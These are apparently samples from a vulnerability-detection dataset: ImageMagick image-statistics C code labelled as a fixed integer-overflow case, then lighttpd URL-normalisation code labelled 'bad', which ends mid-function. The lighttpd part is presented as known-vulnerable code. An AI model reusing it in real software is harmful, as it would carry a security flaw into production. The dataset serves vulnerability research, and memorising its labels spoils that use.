if ((channel & RedChannel) != 0)
polynomial_pixel[x].red+=coefficient*pow(QuantumScale*p->red,degree);
if ((channel & GreenChannel) != 0)
polynomial_pixel[x].green+=coefficient*pow(QuantumScale*p->green,
degree);
if ((channel & BlueChannel) != 0)
polynomial_pixel[x].blue+=coefficient*pow(QuantumScale*p->blue,
degree);
if ((channel & OpacityChannel) != 0)
polynomial_pixel[x].opacity+=coefficient*pow(QuantumScale*
(QuantumRange-p->opacity),degree);
if (((channel & IndexChannel) != 0) &&
(image->colorspace == CMYKColorspace))
polynomial_pixel[x].index+=coefficient*pow(QuantumScale*indexes[x],
degree);
p++;
}
image_view=DestroyCacheView(image_view);
next=GetNextImageInList(next);
}
for (x=0; x < (ssize_t) image->columns; x++)
{
SetPixelRed(q,ClampToQuantum(QuantumRange*polynomial_pixel[x].red));
SetPixelGreen(q,ClampToQuantum(QuantumRange*polynomial_pixel[x].green));
SetPixelBlue(q,ClampToQuantum(QuantumRange*polynomial_pixel[x].blue));
if (image->matte == MagickFalse)
SetPixelOpacity(q,ClampToQuantum(QuantumRange-QuantumRange*
polynomial_pixel[x].opacity));
else
SetPixelAlpha(q,ClampToQuantum(QuantumRange-QuantumRange*
polynomial_pixel[x].opacity));
if (image->colorspace == CMYKColorspace)
SetPixelIndex(polynomial_indexes+x,ClampToQuantum(QuantumRange*
polynomial_pixel[x].index));
q++;
}
if (SyncCacheViewAuthenticPixels(polynomial_view,exception) == MagickFalse)
status=MagickFalse;
if (images->progress_monitor != (MagickProgressMonitor) NULL)
{
MagickBooleanType
proceed;
proceed=SetImageProgress(images,PolynomialImageTag,progress++,
image->rows);
if (proceed == MagickFalse)
status=MagickFalse;
}
}
polynomial_view=DestroyCacheView(polynomial_view);
polynomial_pixels=DestroyPixelThreadSet(images,polynomial_pixels);
if (status == MagickFalse)
image=DestroyImage(image);
return(image);
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% S t a t i s t i c I m a g e %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% StatisticImage() makes each pixel the min / max / median / mode / etc. of
% the neighborhood of the specified width and height.
%
% The format of the StatisticImage method is:
%
% Image *StatisticImage(const Image *image,const StatisticType type,
% const size_t width,const size_t height,ExceptionInfo *exception)
% Image *StatisticImageChannel(const Image *image,
% const ChannelType channel,const StatisticType type,
% const size_t width,const size_t height,ExceptionInfo *exception)
%
% A description of each parameter follows:
%
% o image: the image.
%
% o channel: the image channel.
%
% o type: the statistic type (median, mode, etc.).
%
% o width: the width of the pixel neighborhood.
%
% o height: the height of the pixel neighborhood.
%
% o exception: return any errors or warnings in this structure.
%
*/
#define ListChannels 5
typedef struct _ListNode
{
size_t
next[9],
count,
signature;
} ListNode;
typedef struct _SkipList
{
ssize_t
level;
ListNode
*nodes;
} SkipList;
typedef struct _PixelList
{
size_t
length,
seed,
signature;
SkipList
lists[ListChannels];
} PixelList;
static PixelList *DestroyPixelList(PixelList *pixel_list)
{
register ssize_t
i;
if (pixel_list == (PixelList *) NULL)
return((PixelList *) NULL);
for (i=0; i < ListChannels; i++)
if (pixel_list->lists[i].nodes != (ListNode *) NULL)
pixel_list->lists[i].nodes=(ListNode *) RelinquishAlignedMemory(
pixel_list->lists[i].nodes);
pixel_list=(PixelList *) RelinquishMagickMemory(pixel_list);
return(pixel_list);
}
static PixelList **DestroyPixelListThreadSet(PixelList **pixel_list)
{
register ssize_t
i;
assert(pixel_list != (PixelList **) NULL);
for (i=0; i < (ssize_t) GetMagickResourceLimit(ThreadResource); i++)
if (pixel_list[i] != (PixelList *) NULL)
pixel_list[i]=DestroyPixelList(pixel_list[i]);
pixel_list=(PixelList **) RelinquishMagickMemory(pixel_list);
return(pixel_list);
}
static PixelList *AcquirePixelList(const size_t width,const size_t height)
{
PixelList
*pixel_list;
register ssize_t
i;
pixel_list=(PixelList *) AcquireMagickMemory(sizeof(*pixel_list));
if (pixel_list == (PixelList *) NULL)
return(pixel_list);
(void) memset((void *) pixel_list,0,sizeof(*pixel_list));
pixel_list->length=width*height;
for (i=0; i < ListChannels; i++)
{
pixel_list->lists[i].nodes=(ListNode *) AcquireAlignedMemory(65537UL,
sizeof(*pixel_list->lists[i].nodes));
if (pixel_list->lists[i].nodes == (ListNode *) NULL)
return(DestroyPixelList(pixel_list));
(void) memset(pixel_list->lists[i].nodes,0,65537UL*
sizeof(*pixel_list->lists[i].nodes));
}
pixel_list->signature=MagickCoreSignature;
return(pixel_list);
}
static PixelList **AcquirePixelListThreadSet(const size_t width,
const size_t height)
{
PixelList
**pixel_list;
register ssize_t
i;
size_t
number_threads;
number_threads=(size_t) GetMagickResourceLimit(ThreadResource);
pixel_list=(PixelList **) AcquireQuantumMemory(number_threads,
sizeof(*pixel_list));
if (pixel_list == (PixelList **) NULL)
return((PixelList **) NULL);
(void) memset(pixel_list,0,number_threads*sizeof(*pixel_list));
for (i=0; i < (ssize_t) number_threads; i++)
{
pixel_list[i]=AcquirePixelList(width,height);
if (pixel_list[i] == (PixelList *) NULL)
return(DestroyPixelListThreadSet(pixel_list));
}
return(pixel_list);
}
static void AddNodePixelList(PixelList *pixel_list,const ssize_t channel,
const size_t color)
{
register SkipList
*list;
register ssize_t
level;
size_t
search,
update[9];
/*
Initialize the node.
*/
list=pixel_list->lists+channel;
list->nodes[color].signature=pixel_list->signature;
list->nodes[color].count=1;
/*
Determine where it belongs in the list.
*/
search=65536UL;
for (level=list->level; level >= 0; level--)
{
while (list->nodes[search].next[level] < color)
search=list->nodes[search].next[level];
update[level]=search;
}
/*
Generate a pseudo-random level for this node.
*/
for (level=0; ; level++)
{
pixel_list->seed=(pixel_list->seed*42893621L)+1L;
if ((pixel_list->seed & 0x300) != 0x300)
break;
}
if (level > 8)
level=8;
if (level > (list->level+2))
level=list->level+2;
/*
If we're raising the list's level, link back to the root node.
*/
while (level > list->level)
{
list->level++;
update[list->level]=65536UL;
}
/*
Link the node into the skip-list.
*/
do
{
list->nodes[color].next[level]=list->nodes[update[level]].next[level];
list->nodes[update[level]].next[level]=color;
} while (level-- > 0);
}
static void GetMaximumPixelList(PixelList *pixel_list,MagickPixelPacket *pixel)
{
register SkipList
*list;
register ssize_t
channel;
size_t
color,
maximum;
ssize_t
count;
unsigned short
channels[ListChannels];
/*
Find the maximum value for each of the color.
*/
for (channel=0; channel < 5; channel++)
{
list=pixel_list->lists+channel;
color=65536L;
count=0;
maximum=list->nodes[color].next[0];
do
{
color=list->nodes[color].next[0];
if (color > maximum)
maximum=color;
count+=list->nodes[color].count;
} while (count < (ssize_t) pixel_list->length);
channels[channel]=(unsigned short) maximum;
}
pixel->red=(MagickRealType) ScaleShortToQuantum(channels[0]);
pixel->green=(MagickRealType) ScaleShortToQuantum(channels[1]);
pixel->blue=(MagickRealType) ScaleShortToQuantum(channels[2]);
pixel->opacity=(MagickRealType) ScaleShortToQuantum(channels[3]);
pixel->index=(MagickRealType) ScaleShortToQuantum(channels[4]);
}
static void GetMeanPixelList(PixelList *pixel_list,MagickPixelPacket *pixel)
{
MagickRealType
sum;
register SkipList
*list;
register ssize_t
channel;
size_t
color;
ssize_t
count;
unsigned short
channels[ListChannels];
/*
Find the mean value for each of the color.
*/
for (channel=0; channel < 5; channel++)
{
list=pixel_list->lists+channel;
color=65536L;
count=0;
sum=0.0;
do
{
color=list->nodes[color].next[0];
sum+=(MagickRealType) list->nodes[color].count*color;
count+=list->nodes[color].count;
} while (count < (ssize_t) pixel_list->length);
sum/=pixel_list->length;
channels[channel]=(unsigned short) sum;
}
pixel->red=(MagickRealType) ScaleShortToQuantum(channels[0]);
pixel->green=(MagickRealType) ScaleShortToQuantum(channels[1]);
pixel->blue=(MagickRealType) ScaleShortToQuantum(channels[2]);
pixel->opacity=(MagickRealType) ScaleShortToQuantum(channels[3]);
pixel->index=(MagickRealType) ScaleShortToQuantum(channels[4]);
}
static void GetMedianPixelList(PixelList *pixel_list,MagickPixelPacket *pixel)
{
register SkipList
*list;
register ssize_t
channel;
size_t
color;
ssize_t
count;
unsigned short
channels[ListChannels];
/*
Find the median value for each of the color.
*/
for (channel=0; channel < 5; channel++)
{
list=pixel_list->lists+channel;
color=65536L;
count=0;
do
{
color=list->nodes[color].next[0];
count+=list->nodes[color].count;
} while (count <= (ssize_t) (pixel_list->length >> 1));
channels[channel]=(unsigned short) color;
}
GetMagickPixelPacket((const Image *) NULL,pixel);
pixel->red=(MagickRealType) ScaleShortToQuantum(channels[0]);
pixel->green=(MagickRealType) ScaleShortToQuantum(channels[1]);
pixel->blue=(MagickRealType) ScaleShortToQuantum(channels[2]);
pixel->opacity=(MagickRealType) ScaleShortToQuantum(channels[3]);
pixel->index=(MagickRealType) ScaleShortToQuantum(channels[4]);
}
static void GetMinimumPixelList(PixelList *pixel_list,MagickPixelPacket *pixel)
{
register SkipList
*list;
register ssize_t
channel;
size_t
color,
minimum;
ssize_t
count;
unsigned short
channels[ListChannels];
/*
Find the minimum value for each of the color.
*/
for (channel=0; channel < 5; channel++)
{
list=pixel_list->lists+channel;
count=0;
color=65536UL;
minimum=list->nodes[color].next[0];
do
{
color=list->nodes[color].next[0];
if (color < minimum)
minimum=color;
count+=list->nodes[color].count;
} while (count < (ssize_t) pixel_list->length);
channels[channel]=(unsigned short) minimum;
}
pixel->red=(MagickRealType) ScaleShortToQuantum(channels[0]);
pixel->green=(MagickRealType) ScaleShortToQuantum(channels[1]);
pixel->blue=(MagickRealType) ScaleShortToQuantum(channels[2]);
pixel->opacity=(MagickRealType) ScaleShortToQuantum(channels[3]);
pixel->index=(MagickRealType) ScaleShortToQuantum(channels[4]);
}
static void GetModePixelList(PixelList *pixel_list,MagickPixelPacket *pixel)
{
register SkipList
*list;
register ssize_t
channel;
size_t
color,
max_count,
mode;
ssize_t
count;
unsigned short
channels[5];
/*
Make each pixel the 'predominant color' of the specified neighborhood.
*/
for (channel=0; channel < 5; channel++)
{
list=pixel_list->lists+channel;
color=65536L;
mode=color;
max_count=list->nodes[mode].count;
count=0;
do
{
color=list->nodes[color].next[0];
if (list->nodes[color].count > max_count)
{
mode=color;
max_count=list->nodes[mode].count;
}
count+=list->nodes[color].count;
} while (count < (ssize_t) pixel_list->length);
channels[channel]=(unsigned short) mode;
}
pixel->red=(MagickRealType) ScaleShortToQuantum(channels[0]);
pixel->green=(MagickRealType) ScaleShortToQuantum(channels[1]);
pixel->blue=(MagickRealType) ScaleShortToQuantum(channels[2]);
pixel->opacity=(MagickRealType) ScaleShortToQuantum(channels[3]);
pixel->index=(MagickRealType) ScaleShortToQuantum(channels[4]);
}
static void GetNonpeakPixelList(PixelList *pixel_list,MagickPixelPacket *pixel)
{
register SkipList
*list;
register ssize_t
channel;
size_t
color,
next,
previous;
ssize_t
count;
unsigned short
channels[5];
/*
Finds the non peak value for each of the colors.
*/
for (channel=0; channel < 5; channel++)
{
list=pixel_list->lists+channel;
color=65536L;
next=list->nodes[color].next[0];
count=0;
do
{
previous=color;
color=next;
next=list->nodes[color].next[0];
count+=list->nodes[color].count;
} while (count <= (ssize_t) (pixel_list->length >> 1));
if ((previous == 65536UL) && (next != 65536UL))
color=next;
else
if ((previous != 65536UL) && (next == 65536UL))
color=previous;
channels[channel]=(unsigned short) color;
}
pixel->red=(MagickRealType) ScaleShortToQuantum(channels[0]);
pixel->green=(MagickRealType) ScaleShortToQuantum(channels[1]);
pixel->blue=(MagickRealType) ScaleShortToQuantum(channels[2]);
pixel->opacity=(MagickRealType) ScaleShortToQuantum(channels[3]);
pixel->index=(MagickRealType) ScaleShortToQuantum(channels[4]);
}
static void GetRootMeanSquarePixelList(PixelList *pixel_list,
MagickPixelPacket *pixel)
{
MagickRealType
sum;
register SkipList
*list;
register ssize_t
channel;
size_t
color;
ssize_t
count;
unsigned short
channels[ListChannels];
/*
Find the root mean square value for each of the color.
*/
for (channel=0; channel < 5; channel++)
{
list=pixel_list->lists+channel;
color=65536L;
count=0;
sum=0.0;
do
{
color=list->nodes[color].next[0];
sum+=(MagickRealType) (list->nodes[color].count*color*color);
count+=list->nodes[color].count;
} while (count < (ssize_t) pixel_list->length);
sum/=pixel_list->length;
channels[channel]=(unsigned short) sqrt(sum);
}
pixel->red=(MagickRealType) ScaleShortToQuantum(channels[0]);
pixel->green=(MagickRealType) ScaleShortToQuantum(channels[1]);
pixel->blue=(MagickRealType) ScaleShortToQuantum(channels[2]);
pixel->opacity=(MagickRealType) ScaleShortToQuantum(channels[3]);
pixel->index=(MagickRealType) ScaleShortToQuantum(channels[4]);
}
static void GetStandardDeviationPixelList(PixelList *pixel_list,
MagickPixelPacket *pixel)
{
MagickRealType
sum,
sum_squared;
register SkipList
*list;
register ssize_t
channel;
size_t
color;
ssize_t
count;
unsigned short
channels[ListChannels];
/*
Find the standard-deviation value for each of the color.
*/
for (channel=0; channel < 5; channel++)
{
list=pixel_list->lists+channel;
color=65536L;
count=0;
sum=0.0;
sum_squared=0.0;
do
{
register ssize_t
i;
color=list->nodes[color].next[0];
sum+=(MagickRealType) list->nodes[color].count*color;
for (i=0; i < (ssize_t) list->nodes[color].count; i++)
sum_squared+=((MagickRealType) color)*((MagickRealType) color);
count+=list->nodes[color].count;
} while (count < (ssize_t) pixel_list->length);
sum/=pixel_list->length;
sum_squared/=pixel_list->length;
channels[channel]=(unsigned short) sqrt(sum_squared-(sum*sum));
}
pixel->red=(MagickRealType) ScaleShortToQuantum(channels[0]);
pixel->green=(MagickRealType) ScaleShortToQuantum(channels[1]);
pixel->blue=(MagickRealType) ScaleShortToQuantum(channels[2]);
pixel->opacity=(MagickRealType) ScaleShortToQuantum(channels[3]);
pixel->index=(MagickRealType) ScaleShortToQuantum(channels[4]);
}
static inline void InsertPixelList(const Image *image,const PixelPacket *pixel,
const IndexPacket *indexes,PixelList *pixel_list)
{
size_t
signature;
unsigned short
index;
index=ScaleQuantumToShort(GetPixelRed(pixel));
signature=pixel_list->lists[0].nodes[index].signature;
if (signature == pixel_list->signature)
pixel_list->lists[0].nodes[index].count++;
else
AddNodePixelList(pixel_list,0,index);
index=ScaleQuantumToShort(GetPixelGreen(pixel));
signature=pixel_list->lists[1].nodes[index].signature;
if (signature == pixel_list->signature)
pixel_list->lists[1].nodes[index].count++;
else
AddNodePixelList(pixel_list,1,index);
index=ScaleQuantumToShort(GetPixelBlue(pixel));
signature=pixel_list->lists[2].nodes[index].signature;
if (signature == pixel_list->signature)
pixel_list->lists[2].nodes[index].count++;
else
AddNodePixelList(pixel_list,2,index);
index=ScaleQuantumToShort(GetPixelOpacity(pixel));
signature=pixel_list->lists[3].nodes[index].signature;
if (signature == pixel_list->signature)
pixel_list->lists[3].nodes[index].count++;
else
AddNodePixelList(pixel_list,3,index);
if (image->colorspace == CMYKColorspace)
index=ScaleQuantumToShort(GetPixelIndex(indexes));
signature=pixel_list->lists[4].nodes[index].signature;
if (signature == pixel_list->signature)
pixel_list->lists[4].nodes[index].count++;
else
AddNodePixelList(pixel_list,4,index);
}
static void ResetPixelList(PixelList *pixel_list)
{
int
level;
register ListNode
*root;
register SkipList
*list;
register ssize_t
channel;
/*
Reset the skip-list.
*/
for (channel=0; channel < 5; channel++)
{
list=pixel_list->lists+channel;
root=list->nodes+65536UL;
list->level=0;
for (level=0; level < 9; level++)
root->next[level]=65536UL;
}
pixel_list->seed=pixel_list->signature++;
}
MagickExport Image *StatisticImage(const Image *image,const StatisticType type,
const size_t width,const size_t height,ExceptionInfo *exception)
{
Image
*statistic_image;
statistic_image=StatisticImageChannel(image,DefaultChannels,type,width,
height,exception);
return(statistic_image);
}
MagickExport Image *StatisticImageChannel(const Image *image,
const ChannelType channel,const StatisticType type,const size_t width,
const size_t height,ExceptionInfo *exception)
{
#define StatisticImageTag "Statistic/Image"
CacheView
*image_view,
*statistic_view;
Image
*statistic_image;
MagickBooleanType
status;
MagickOffsetType
progress;
PixelList
**magick_restrict pixel_list;
size_t
neighbor_height,
neighbor_width;
ssize_t
y;
/*
Initialize statistics image attributes.
*/
assert(image != (Image *) NULL);
assert(image->signature == MagickCoreSignature);
if (image->debug != MagickFalse)
(void) LogMagickEvent(TraceEvent,GetMagickModule(),"%s",image->filename);
assert(exception != (ExceptionInfo *) NULL);
assert(exception->signature == MagickCoreSignature);
statistic_image=CloneImage(image,0,0,MagickTrue,exception);
if (statistic_image == (Image *) NULL)
return((Image *) NULL);
if (SetImageStorageClass(statistic_image,DirectClass) == MagickFalse)
{
InheritException(exception,&statistic_image->exception);
statistic_image=DestroyImage(statistic_image);
return((Image *) NULL);
}
neighbor_width=width == 0 ? GetOptimalKernelWidth2D((double) width,0.5) :
width;
neighbor_height=height == 0 ? GetOptimalKernelWidth2D((double) height,0.5) :
height;
pixel_list=AcquirePixelListThreadSet(neighbor_width,neighbor_height);
if (pixel_list == (PixelList **) NULL)
{
statistic_image=DestroyImage(statistic_image);
ThrowImageException(ResourceLimitError,"MemoryAllocationFailed");
}
/*
Make each pixel the min / max / median / mode / etc. of the neighborhood.
*/
status=MagickTrue;
progress=0;
image_view=AcquireVirtualCacheView(image,exception);
statistic_view=AcquireAuthenticCacheView(statistic_image,exception);
#if defined(MAGICKCORE_OPENMP_SUPPORT)
#pragma omp parallel for schedule(static) shared(progress,status) \
magick_number_threads(image,statistic_image,statistic_image->rows,1)
#endif
for (y=0; y < (ssize_t) statistic_image->rows; y++)
{
const int
id = GetOpenMPThreadId();
register const IndexPacket
*magick_restrict indexes;
register const PixelPacket
*magick_restrict p;
register IndexPacket
*magick_restrict statistic_indexes;
register PixelPacket
*magick_restrict q;
register ssize_t
x;
if (status == MagickFalse)
continue;
p=GetCacheViewVirtualPixels(image_view,-((ssize_t) neighbor_width/2L),y-
(ssize_t) (neighbor_height/2L),image->columns+neighbor_width,
neighbor_height,exception);
q=QueueCacheViewAuthenticPixels(statistic_view,0,y,statistic_image->columns, 1,exception);
if ((p == (const PixelPacket *) NULL) || (q == (PixelPacket *) NULL))
{
status=MagickFalse;
continue;
}
indexes=GetCacheViewVirtualIndexQueue(image_view);
statistic_indexes=GetCacheViewAuthenticIndexQueue(statistic_view);
for (x=0; x < (ssize_t) statistic_image->columns; x++)
{
MagickPixelPacket
pixel;
register const IndexPacket
*magick_restrict s;
register const PixelPacket
*magick_restrict r;
register ssize_t
u,
v;
r=p;
s=indexes+x;
ResetPixelList(pixel_list[id]);
for (v=0; v < (ssize_t) neighbor_height; v++)
{
for (u=0; u < (ssize_t) neighbor_width; u++)
InsertPixelList(image,r+u,s+u,pixel_list[id]);
r+=image->columns+neighbor_width;
s+=image->columns+neighbor_width;
}
GetMagickPixelPacket(image,&pixel);
SetMagickPixelPacket(image,p+neighbor_width*neighbor_height/2,indexes+x+
neighbor_width*neighbor_height/2,&pixel);
switch (type)
{
case GradientStatistic:
{
MagickPixelPacket
maximum,
minimum;
GetMinimumPixelList(pixel_list[id],&pixel);
minimum=pixel;
GetMaximumPixelList(pixel_list[id],&pixel);
maximum=pixel;
pixel.red=MagickAbsoluteValue(maximum.red-minimum.red);
pixel.green=MagickAbsoluteValue(maximum.green-minimum.green);
pixel.blue=MagickAbsoluteValue(maximum.blue-minimum.blue);
pixel.opacity=MagickAbsoluteValue(maximum.opacity-minimum.opacity);
if (image->colorspace == CMYKColorspace)
pixel.index=MagickAbsoluteValue(maximum.index-minimum.index);
break;
}
case MaximumStatistic:
{
GetMaximumPixelList(pixel_list[id],&pixel);
break;
}
case MeanStatistic:
{
GetMeanPixelList(pixel_list[id],&pixel);
break;
}
case MedianStatistic:
default:
{
GetMedianPixelList(pixel_list[id],&pixel);
break;
}
case MinimumStatistic:
{
GetMinimumPixelList(pixel_list[id],&pixel);
break;
}
case ModeStatistic:
{
GetModePixelList(pixel_list[id],&pixel);
break;
}
case NonpeakStatistic:
{
GetNonpeakPixelList(pixel_list[id],&pixel);
break;
}
case RootMeanSquareStatistic:
{
GetRootMeanSquarePixelList(pixel_list[id],&pixel);
break;
}
case StandardDeviationStatistic:
{
GetStandardDeviationPixelList(pixel_list[id],&pixel);
break;
}
}
if ((channel & RedChannel) != 0)
SetPixelRed(q,ClampToQuantum(pixel.red));
if ((channel & GreenChannel) != 0)
SetPixelGreen(q,ClampToQuantum(pixel.green));
if ((channel & BlueChannel) != 0)
SetPixelBlue(q,ClampToQuantum(pixel.blue));
if ((channel & OpacityChannel) != 0)
SetPixelOpacity(q,ClampToQuantum(pixel.opacity));
if (((channel & IndexChannel) != 0) &&
(image->colorspace == CMYKColorspace))
SetPixelIndex(statistic_indexes+x,ClampToQuantum(pixel.index));
p++;
q++;
}
if (SyncCacheViewAuthenticPixels(statistic_view,exception) == MagickFalse)
status=MagickFalse;
if (image->progress_monitor != (MagickProgressMonitor) NULL)
{
MagickBooleanType
proceed;
proceed=SetImageProgress(image,StatisticImageTag,progress++,
image->rows);
if (proceed == MagickFalse)
status=MagickFalse;
}
}
statistic_view=DestroyCacheView(statistic_view);
image_view=DestroyCacheView(image_view);
pixel_list=DestroyPixelListThreadSet(pixel_list);
if (status == MagickFalse)
statistic_image=DestroyImage(statistic_image);
return(statistic_image);
}
| ./CrossVul/dataset_final_sorted/CWE-190/c/good_4425_0 |
crossvul-cpp_data_bad_797_0 | #include "first.h"
#include "burl.h"
#include <string.h>
#include "buffer.h"
#include "base64.h"
static const char hex_chars_uc[] = "0123456789ABCDEF";
/* everything except: ! $ & ' ( ) * + , - . / 0-9 : ; = ? @ A-Z _ a-z ~ */
static const char encoded_chars_http_uri_reqd[] = {
/*
0 1 2 3 4 5 6 7 8 9 A B C D E F
*/
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, /* 00 - 0F control chars */
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, /* 10 - 1F */
1, 0, 1, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, /* 20 - 2F space " # % */
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, /* 30 - 3F < > */
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, /* 40 - 4F */
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 0, /* 50 - 5F [ \ ] ^ */
1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, /* 60 - 6F ` */
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 0, 1, /* 70 - 7F { | } DEL */
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, /* 80 - 8F */
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, /* 90 - 9F */
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, /* A0 - AF */
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, /* B0 - BF */
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, /* C0 - CF */
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, /* D0 - DF */
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, /* E0 - EF */
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, /* F0 - FF */
};
/* c (char) and n (nibble) MUST be unsigned integer types */
#define li_cton(c,n) \
(((n) = (c) - '0') <= 9 || (((n) = ((c)&0xdf) - 'A') <= 5 ? ((n) += 10) : 0))
/* b (byte) MUST be unsigned integer type
* https://en.wikipedia.org/wiki/UTF-8
* reject overlong encodings of 7-byte ASCII and invalid UTF-8
* (but does not detect other overlong multi-byte encodings) */
#define li_utf8_invalid_byte(b) ((b) >= 0xF5 || ((b)|0x1) == 0xC1)
static int burl_is_unreserved (const int c)
{
return (light_isalnum(c) || c == '-' || c == '.' || c == '_' || c == '~');
}
static int burl_normalize_basic_unreserved_fix (buffer *b, buffer *t, int i, int qs)
{
int j = i;
const int used = (int)buffer_string_length(b);
const unsigned char * const s = (unsigned char *)b->ptr;
unsigned char * const p =
(unsigned char *)buffer_string_prepare_copy(t,i+(used-i)*3+1);
unsigned int n1, n2;
memcpy(p, s, (size_t)i);
for (; i < used; ++i, ++j) {
if (!encoded_chars_http_uri_reqd[s[i]]) {
if (s[i] == '?' && -1 == qs) qs = j;
p[j] = s[i];
}
else if (s[i]=='%' && li_cton(s[i+1], n1) && li_cton(s[i+2], n2)) {
const unsigned int x = (n1 << 4) | n2;
if (burl_is_unreserved(x)) {
p[j] = x;
}
else {
p[j] = '%';
p[++j] = hex_chars_uc[n1]; /*(s[i+1] & 0xdf)*/
p[++j] = hex_chars_uc[n2]; /*(s[i+2] & 0xdf)*/
if (li_utf8_invalid_byte(x)) qs = -2;
}
i+=2;
}
else if (s[i] == '#') break; /* ignore fragment */
else {
p[j] = '%';
p[++j] = hex_chars_uc[(s[i] >> 4) & 0xF];
p[++j] = hex_chars_uc[s[i] & 0xF];
if (li_utf8_invalid_byte(s[i])) qs = -2;
}
}
buffer_commit(t, (size_t)j);
buffer_copy_buffer(b, t);
return qs;
}
static int burl_normalize_basic_unreserved (buffer *b, buffer *t)
{
const unsigned char * const s = (unsigned char *)b->ptr;
const int used = (int)buffer_string_length(b);
unsigned int n1, n2, x;
int qs = -1;
for (int i = 0; i < used; ++i) {
if (!encoded_chars_http_uri_reqd[s[i]]) {
if (s[i] == '?' && -1 == qs) qs = i;
}
else if (s[i]=='%' && li_cton(s[i+1], n1) && li_cton(s[i+2], n2)
&& !burl_is_unreserved((x = (n1 << 4) | n2))) {
if (li_utf8_invalid_byte(x)) qs = -2;
if (s[i+1] >= 'a') b->ptr[i+1] &= 0xdf; /* uppercase hex */
if (s[i+2] >= 'a') b->ptr[i+2] &= 0xdf; /* uppercase hex */
i+=2;
}
else if (s[i] == '#') { /* ignore fragment */
buffer_string_set_length(b, (size_t)i);
break;
}
else {
qs = burl_normalize_basic_unreserved_fix(b, t, i, qs);
break;
}
}
return qs;
}
static int burl_normalize_basic_required_fix (buffer *b, buffer *t, int i, int qs)
{
int j = i;
const int used = (int)buffer_string_length(b);
const unsigned char * const s = (unsigned char *)b->ptr;
unsigned char * const p =
(unsigned char *)buffer_string_prepare_copy(t,i+(used-i)*3+1);
unsigned int n1, n2;
memcpy(p, s, (size_t)i);
for (; i < used; ++i, ++j) {
if (!encoded_chars_http_uri_reqd[s[i]]) {
if (s[i] == '?' && -1 == qs) qs = j;
p[j] = s[i];
}
else if (s[i]=='%' && li_cton(s[i+1], n1) && li_cton(s[i+2], n2)) {
const unsigned int x = (n1 << 4) | n2;
if (!encoded_chars_http_uri_reqd[x]
&& (qs < 0 ? (x!='/'&&x!='?') : (x!='&'&&x!='='&&x!=';'))) {
p[j] = x;
}
else {
p[j] = '%';
p[++j] = hex_chars_uc[n1]; /*(s[i+1] & 0xdf)*/
p[++j] = hex_chars_uc[n2]; /*(s[i+2] & 0xdf)*/
if (li_utf8_invalid_byte(x)) qs = -2;
}
i+=2;
}
else if (s[i] == '#') break; /* ignore fragment */
else {
p[j] = '%';
p[++j] = hex_chars_uc[(s[i] >> 4) & 0xF];
p[++j] = hex_chars_uc[s[i] & 0xF];
if (li_utf8_invalid_byte(s[i])) qs = -2;
}
}
buffer_commit(t, (size_t)j);
buffer_copy_buffer(b, t);
return qs;
}
static int burl_normalize_basic_required (buffer *b, buffer *t)
{
const unsigned char * const s = (unsigned char *)b->ptr;
const int used = (int)buffer_string_length(b);
unsigned int n1, n2, x;
int qs = -1;
for (int i = 0; i < used; ++i) {
if (!encoded_chars_http_uri_reqd[s[i]]) {
if (s[i] == '?' && -1 == qs) qs = i;
}
else if (s[i]=='%' && li_cton(s[i+1], n1) && li_cton(s[i+2], n2)
&& (encoded_chars_http_uri_reqd[(x = (n1 << 4) | n2)]
||(qs < 0 ? (x=='/'||x=='?') : (x=='&'||x=='='||x==';')))){
if (li_utf8_invalid_byte(x)) qs = -2;
if (s[i+1] >= 'a') b->ptr[i+1] &= 0xdf; /* uppercase hex */
if (s[i+2] >= 'a') b->ptr[i+2] &= 0xdf; /* uppercase hex */
i+=2;
}
else if (s[i] == '#') { /* ignore fragment */
buffer_string_set_length(b, (size_t)i);
break;
}
else {
qs = burl_normalize_basic_required_fix(b, t, i, qs);
break;
}
}
return qs;
}
static int burl_contains_ctrls (const buffer *b)
{
const char * const s = b->ptr;
const int used = (int)buffer_string_length(b);
for (int i = 0; i < used; ++i) {
if (s[i] == '%' && (s[i+1] < '2' || (s[i+1] == '7' && s[i+2] == 'F')))
return 1;
}
return 0;
}
static void burl_normalize_qs20_to_plus_fix (buffer *b, int i)
{
char * const s = b->ptr;
const int used = (int)buffer_string_length(b);
int j = i;
for (; i < used; ++i, ++j) {
s[j] = s[i];
if (s[i] == '%' && s[i+1] == '2' && s[i+2] == '0') {
s[j] = '+';
i+=2;
}
}
buffer_string_set_length(b, j);
}
static void burl_normalize_qs20_to_plus (buffer *b, int qs)
{
const char * const s = b->ptr;
const int used = qs < 0 ? 0 : (int)buffer_string_length(b);
int i;
if (qs < 0) return;
for (i = qs+1; i < used; ++i) {
if (s[i] == '%' && s[i+1] == '2' && s[i+2] == '0') break;
}
if (i != used) burl_normalize_qs20_to_plus_fix(b, i);
}
static int burl_normalize_2F_to_slash_fix (buffer *b, int qs, int i)
{
char * const s = b->ptr;
const int blen = (int)buffer_string_length(b);
